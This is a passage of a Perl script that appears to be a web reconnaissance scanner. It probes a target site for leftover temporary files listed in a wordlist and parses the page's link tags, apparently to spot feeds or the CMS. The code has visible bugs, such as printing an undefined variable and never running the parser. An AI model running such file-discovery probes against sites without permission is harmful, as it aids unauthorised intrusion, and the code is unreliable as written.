open(TEMPS, "libs/temps.txt") || die "No existe la DB!\n";
while($temp = <TEMPS>){
chomp($temp);
$tempurl = $web."/".$temp;
  $req = HTTP::Request->new(HEAD => $tempurl);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if ($res->is_success) {
print "Interesting File Found: ".$tempurl."\n";
  }
}
}

sub cms {
  my $p = new HTML::Parser;
  $req = HTTP::Request->new(GET => $web);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if($res->is_success) {
$html = $res->content;
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "link") {
$type = $attr->{"type"};
if($type =~ "application/") {
$href = $attr->{"href"};
if($href !~ "http://") { $href = "http://$host/$href";}
print "RSS: ".$rss."\n";
}
}
}

}}}